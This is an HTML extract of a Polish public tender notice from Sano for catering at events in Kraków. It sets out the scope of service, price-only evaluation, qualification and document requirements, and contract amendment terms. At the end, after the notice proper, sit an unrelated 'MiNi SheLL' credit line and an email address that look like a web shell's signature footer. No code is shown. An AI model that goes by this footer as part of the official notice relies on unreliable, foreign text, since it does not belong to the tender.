stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III- Usługa cateringu dla Sano w dniu 28-29 listopada 2024 r. na wydarzeniu LSOS.<br/> Przedmiotem zamówienia jest świadczenie usługi cateringu podczas wydarzenia LSOS obejmującej przygotowanie,<br/> dostarczenie i podanie posiłków i napojów , bieżącą obsługę podczas Wydarzenia, a także zapewnienie dodatkowych<br/> działań na warunkach i w zakresie wskazanym w Opisie Przedmiotu Zamówienia (“OPZ”) stanowiący Załącznik nr 1 do<br/> SWZ.<br/> Realizacja zamówienia odbędzie się w dniach:<br/> a) 28 listopada 2024 r. w godzinach:<br/> • godzina rozpoczęcia wydarzenia- 09:00<br/> • godzina zakończenia wydarzenia-18:00, <br/>oraz<br/> b) 29 listopada 2024 r. w godzinach:<br/> • godzina rozpoczęcia wydarzenia- 09:00;<br/> • godzina zakończenia wydarzenia -15:30.<br/> Miejscem realizacji zamówienia będzie Audytorium Maximum, ul. Krupnicza 33, 31-123 Kraków, Sala Wystawowa.<br/> Usługa cateringu obejmuje:<br/> a) transport cateringu;<br/> b) dojazd do i z miejsca realizacji zamówienia;<br/> c) wniesienie i rozłożenie miejsc cateringowych<br/> d) udostępnienie niezbędnej zastawy porcelanowej, szklanek, naczyń, sztućców, podgrzewaczy, zaparzaczy, ekspresów do<br/> kawy (ciśnieniowych), serwetek i innych urządzeń, naczyń oraz akcesoriów potrzebnych do realizacji zamówienia;<br/> e) obsługę kelnerską adekwatną do liczby konsumentów, która zapewni na bieżąco sprzątanie brudnych naczyń, a także<br/> odpadów powstałych w trakcie cateringu, dostarczanie czystych naczyń, uzupełnianie miejsca kawowego i poszczególnych<br/> bufetów;<br/> f) stoły wraz z nakryciem potrzebne do przygotowania miejsca kawowego oraz bufetów;<br/> g) stoły koktajlowe, dostępne w czasie lunchu i bufetu, w ilości 30 szt. wraz z obrusami odpowiednimi dla tych stołów z<br/> tkaniny w jednakowych kolorach,<br/> h) sprzątanie cateringu wraz z zebraniem i wywiezieniem odpadów powstałych po cateringu.<br/> Catering powinien zostać przygotowany w ilości odpowiedniej dla 250 osób.<br/> Catering zarówno w 1 jak i w 2 dniu obejmuje (dokładny zakres cateringu został wskazany w Tabeli nr 3 OPZ):<br/> a) Miejsca kawowe –3 stanowiska dla łącznie 250 osób;<br/> b) Bufet przekąsek- 3 stanowiska dla łącznie 250 osób;<br/> c) Lunch - dla 250 osób; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">55310000-6 - Restauracyjne usługi kelnerskie</p> <p class="mb-0">55330000-2 - Usługi kawiarniane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-28 do 2024-11-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przyjęte kryteria oceny ofert dla wszystkich części postępowania:<br/> Cena - waga kryterium 100%<br/> W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru zgodnie z pkt 18.2 SWZ.<br/> Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr 2 do SWZ).<br/> Za najkorzystniejszą ofertę uznana zostanie oferta wykonawcy, która uzyska największą, liczbę punktów.<br/> Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie,<br/> zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/> dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV- Usługa cateringu dla Sano w dniach 18-19 stycznia 2025 r. na wydarzeniu organizowanym przez Sano;<br/> Przedmiotem zamówienia jest świadczenie usługi cateringu podczas wydarzenia organizowanego przez Sano, obejmującej<br/> przygotowanie, dostarczenie i podanie posiłków , bieżącą obsługę podczas Wydarzenia, a także zapewnienie dodatkowych<br/> działań na warunkach i w zakresie wskazanym w Opisie Przedmiotu Zamówienia (“OPZ”) stanowiący Załącznik nr 1 do<br/> SWZ.<br/> Realizacja zamówienia odbędzie się w dniach 18-19 stycznia 2025 r. w godzinach:<br/> a) godzina rozpoczęcia wydarzenia-12:30<br/> b) godzina zakończenia wydarzenia -15:30.<br/> Zamawiający przewiduje możliwość zmiany przez Zamawiającego terminu realizacji Usługi Cateringu , z tym, że zmiana ta<br/> może być dokonana najpóźniej do dnia 3 stycznia 2025 r., a nowy termin nie może być wyznaczony później, niż do dnia 9<br/> lutego 2025 r.<br/> Miejscem realizacji zamówienia będzie Centrum Energetyki AGH, ul. Czarnowiejska 36 budynek C5, 30-054 Kraków.<br/> Usługa cateringu obejmuje:<br/> a) transport cateringu;<br/> b) dojazd do i z miejsca realizacji zamówienia;<br/> c) wniesienie i rozłożenie miejsc cateringowych<br/> d) udostępnienie niezbędnej zastawy porcelanowej, szklanek, naczyń, sztućców, podgrzewaczy, serwetek i innych<br/> urządzeń, naczyń oraz akcesoriów potrzebnych do realizacji zamówienia;<br/> e) obsługę kelnerską adekwatną do liczby konsumentów, która zapewni na bieżąco sprzątanie brudnych naczyń, a także<br/> odpadów powstałych w trakcie cateringu, dostarczanie czystych naczyń;<br/> f) stoły wraz z nakryciem z tkaniny w jednakowych kolorach potrzebne do przygotowania lunchu;<br/> g) sprzątanie cateringu wraz z zebraniem i wywiezieniem odpadów powstałych po cateringu.<br/> Catering powinien zostać przygotowany w ilości odpowiedniej dla 20 osób.<br/> Catering obejmuje (dokładny zakres cateringu został wskazany w Tabeli nr 4 OPZ):<br/> a) Lunch- dla 20 osób w 1 dzień;<br/> b) Lunch- dla 20 osób w 2 dzień </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">55310000-6 - Restauracyjne usługi kelnerskie</p> <p class="mb-0">55330000-2 - Usługi kawiarniane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-18 do 2025-01-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przyjęte kryteria oceny ofert dla wszystkich części postępowania:<br/> Cena - waga kryterium 100%<br/> W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru zgodnie z pkt 18.2 SWZ.<br/> Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr 2 do SWZ).<br/> Za najkorzystniejszą ofertę uznana zostanie oferta wykonawcy, która uzyska największą, liczbę punktów.<br/> Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie,<br/> zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/> dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Tylko dla Części III postępowania- Usługa cateringu dla Sano w dniu 28-29 listopada 2024 r. na wydarzeniu LSOS<br/><br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej:<br/><br/>Warunek ten, w zakresie doświadczenia zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizował należycie co najmniej 2 usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. usługi cateringu na wydarzeniach konferencyjnych, szkoleniowych lub bankietowych, organizowanych dla minimum 200 osób.<br/><br/>UWAGA: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – powyższe wymagania musi spełniać jeden z wykonawców lub każdy z wykonawców ubiegających się o zamówienie w całości. <br/><br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9 SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu zostały określone w pkt 7.2 <br/>Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy (o którym mowa w art. 125 ust. 1 ustawy PZP-załącznik nr 3 do SWZ) o braku podstaw do wykluczenia z postępowania, a także jeśli oferta składana jest na część III postępowania, o spełnieniu warunków udziału w postepowaniu, aktualne na dzień składania ofert. Informacje zawarte w oświadczeniu, stanowią dowód potwierdzający, że Wykonawca nie podlega wykluczeniu, a także jeśli oferta składana jest na część III postępowania, stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dotyczy tylko części III postępowania -Usługa cateringu dla Sano w dniu 28-29 listopada 2024 r. na wydarzeniu LSOS<br/><br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień składania.<br/><br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1)	(dotyczy tylko części III postępowania) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności zawodowej (doświadczenia) określonych w pkt 7.2 ppkt 4 SIWZ -wykaz usług wykonanych, w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu (rodzaju wykonanych usług), terminów wykonania usług, podmiotów, na rzecz których usługi zostały wykonane, a także ilości osób, dla których organizowane były usługi (wzór wykazu usług stanowi załącznik nr 5 do SWZ).<br/><br/>2)	(dotyczy tylko części III postępowania) Dowody, że wskazane przez Wykonawcę usługi na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub są wykonywane należycie.<br/><br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane (np. protokół odbioru lub ogłoszenie o wykonaniu umowy, zawierający klauzulę wskazującą na dochowanie należytej staranności przez wykonawcę), a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.1.	Wykaz oświadczeń i dokumentów, które Wykonawca musi dołączyć do oferty:<br/>9.1.1.	Oświadczenie Wykonawcy (o którym mowa w art. 125 ust. 1 ustawy PZP-załącznik nr 3 do SWZ) o braku podstaw do wykluczenia z postępowania, a także jeśli oferta składana jest na część III postępowania, o spełnieniu warunków udziału w postepowaniu, aktualne na dzień składania ofert. Informacje zawarte w oświadczeniu, stanowią dowód potwierdzający, że Wykonawca nie podlega wykluczeniu, a także jeśli oferta składana jest na część III postępowania, stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe<br/>9.1.2.	Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>9.1.3.	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 9.1.2.<br/>Postanowienia stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy PZP. <br/>9.1.4.	Pełnomocnictwo (lub inny dokument, z którego wynika pełnomocnictwo) dla pełnomocnika do reprezentowania Wykonawców występujących wspólnie w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi jednoznacznie wynikać z umowy lub z innej czynności prawnej i w swej treści zawierać wskazanie niniejszego postępowania.<br/>9.1.5.	Zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie musi być podpisane przez osobę(y) upoważnioną do składania oświadczeń woli w imieniu podmiotu oddającego zasoby do dyspozycji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/><br/>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy.<br/><br/>W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1)	w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>2)	oferta musi być podpisana w sposób, prawnie wiążący wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)	oświadczenie o którym mowa w pkt 9.2 i 9.3 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/><br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień Umowy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem określonych <br/>w niniejszym paragrafie warunków ich wprowadzenia:<br/>1)	wystąpienia siły wyższej rozumianej jako nadzwyczajne okoliczności niezależne od Stron, których nie można było przewidzieć, jak m.in.: wojna, stany wyjątkowe, strajki generalne, blokady, embargo, działania sił przyrody o charakterze klęsk żywiołowych jak huragany, powodzie, trzęsienia ziemi, pożary, epidemie, pandemie itp., co uniemożliwia wykonanie co najmniej części lub całości Przedmiotu Umowy;<br/>2)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy, w szczególności przepisów normujących wysokość stawki podatku VAT w odniesieniu do części wynagrodzenia, której zmiana dotyczy;<br/>3)	nastąpi zmiana miejsca realizacji Usługi Cateringowej, z powodów organizacyjnych lub przyczyn, których nie dało się przewidzieć przy zawarciu Umowy, z tym, że zmiana ta może być dokonana wyłącznie na miejsce leżące w obrębie miasta wskazanego w § 1 ust. 3 i zmiana ta nie może pociągać pociągnąć za sobą zwiększenia wynagrodzenia należnego Wykonawcy, o jakim mowa w § 5 ust. 1;<br/>4)	zmiana godziny rozpoczęcia Wydarzenia wskazanej w OPZ, z powodów organizacyjnych leżących po stronie Zamawiającego;<br/>5)	(dotyczy tylko części IV) zmiana przez Zamawiającego terminu realizacji Usługi Cateringu , z tym, że zmiana ta może być dokonana najpóźniej do dnia 3 stycznia 2025 r., a nowy termin nie może być wyznaczony później, niż do dnia 9 lutego 2025 r. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sano_czmo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-10 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W przypadku gdy Wykonawca nie przystąpi do realizacji Przedmiotu Umowy, w szczególnie nie stawi się w miejscu realizacji Usługi Cateringu, o jakim mowa w § 1 ust. 3 Umowy na co najmniej 1 godzinę przed planowanym rozpoczęciem Wydarzenia w danym dniu lub podjęte przez Wykonawcę działania związane z realizacją usługi pomimo stawienia się wskazywać będą na brak gotowości do świadczenia Usługi lub niezgodność tych działań z wymaganiami określonymi w SWZ oraz Umowie lub ich niekompletność Zamawiający ma prawo niezależnie od innych uprawnień wynikających z mocy prawa lub Umowy do powierzenia wykonania Usługi Cateringu w całości lub w niezrealizowanej części innej osobie (umowne prawo wykonania zastępczego) na koszt i ryzyko Wykonawcy, na co Wykonawca wyraża zgodę. <br/><br/>Wykonanie umownego prawa wykonania zastępczego wymaga poinformowania o tym fakcie Wykonawcy, przy zachowaniu formy dokumentowej powiadomienia.<br/><br/>Wykonanie zastępcze na koszt Wykonawcy nie zwalnia Wykonawcy z obowiązku zapłaty kary umownej z tytułu nienależytego wykonania zamówienia oraz z odpowiedzialności odszkodowawczej wynikającej z przepisów Kodeksu cywilnego.<br/><br/>Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty.<br/>Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1, jeżeli w postępowaniu o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.<br/>Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>Przed podpisaniem umowy, wybrany wykonawca przekaże zamawiającemu informacje niezbędne do uzupełnienia treści umowy.<br/><br/>Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego oferta została uznana za najkorzystniejszą zobowiązany jest przedłożyć Zamawiającemu:<br/>1)	pełnomocnictwa do reprezentowania Wykonawcy;<br/>2)	dokument potwierdzający posiadanie ubezpieczenia od odpowiedzialności cywilnej określony w Projektowanych Postanowieniach Umowy w sprawie zamówienia publicznego (załącznik nr 4 do SWZ) w wysokości:<br/>i.	dla części III zamówienia- min. 250 000,00 zł;<br/>ii.	dla części I, II i IV zamówienia- min. 50 000,00 zł<br/>3)	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>Niedopełnienie wskazanych formalności będzie traktowane jako uchylanie się przez Wykonawcę od zawarcia umowy w sprawie zamówienia publicznego.

Creat By MiNi SheLL
Email: jattceo@gmail.com